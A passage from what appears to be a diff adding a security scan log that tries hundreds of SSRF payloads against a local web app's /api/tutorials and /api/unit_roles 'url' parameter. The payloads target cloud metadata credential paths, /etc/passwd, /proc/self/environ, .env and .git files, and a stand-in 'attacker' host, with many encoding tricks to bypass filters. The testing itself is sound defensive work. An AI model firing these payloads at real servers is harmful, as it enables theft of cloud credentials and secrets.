`http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tutorials?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/tutorials?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/tutorials?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/tutorials?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/tutorials?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/tutorials?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/tutorials?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/tutorials?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/tutorials?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/tutorials?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/tutorials?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tutorials?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/tutorials?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/tutorials?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tutorials?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/tutorials?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/tutorials?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tutorials?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/tutorials?url=3232235521` +- Testing: `http://localhost:4200/api/tutorials?url=3232235777` +- Testing: `http://localhost:4200/api/tutorials?url=425.510.425.510` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/tutorials?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=instance-data` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A443` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/tutorials?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/tutorials?url=loopback` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A22` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A443` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/tutorials?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/tutorials?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/tutorials?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/tutorials?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/tutorials?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/tutorials?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/tutorials?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tutorials?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tutorials?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tutorials?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tutorials?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tutorials?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tutorials?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tutorials?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tutorials?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tutorials?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tutorials?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tutorials?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tutorials?url=0%2F` +- Testing: `http://localhost:4200/api/tutorials?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/unit_roles +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/unit_roles?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=0` +- Testing: `http://localhost:4200/api/unit_roles?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/unit_roles?url=127.127.127.127` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.1.3` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.0` +- Testing: `http://localhost:4200/api/unit_roles?url=2130706433` +- Testing: `http://localhost:4200/api/unit_roles?url=017700000001` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f000001` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com.localhost` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=localtest.me` +- Testing: `http://localhost:4200/api/unit_roles?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/unit_roles?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/unit_roles?url=2130706433%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235521%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235777%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/unit_roles?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/unit_roles?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/unit_roles?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/unit_roles?url=0%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=localtest.me` +- Testing: `http://localhost:4200/api/unit_roles?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/unit_roles?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/unit_roles?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/unit_roles?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.1.3` +- Testing: `http://localhost:4200/api/unit_roles?url=0` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost` +- Testing: `http://localhost:4200/api/unit_roles?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/unit_roles?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/unit_roles?url=7F000001` +- Testing: `http://localhost:4200/api/unit_roles?url=2130706433` +- Testing: `http://localhost:4200/api/unit_roles?url=6425673729` +- Testing: `http://localhost:4200/api/unit_roles?url=127001` +- Testing: `http://localhost:4200/api/unit_roles?url=127_0._0_1` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/unit_roles?url=localtest.me` +- Testing: `http://localhost:4200/api/unit_roles?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/unit_roles?url=127.127.127.127` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f000001` +- Testing: `http://localhost:4200/api/unit_roles?url=017700000001` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/unit_roles?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/unit_roles?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254` +- Testing: `http://localhost:4200/api/unit_roles?url=2852039166` +- Testing: `http://localhost:4200/api/unit_roles?url=7147006462` +- Testing: `http://localhost:4200/api/unit_roles?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/unit_roles?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/unit_roles?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/unit_roles?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: 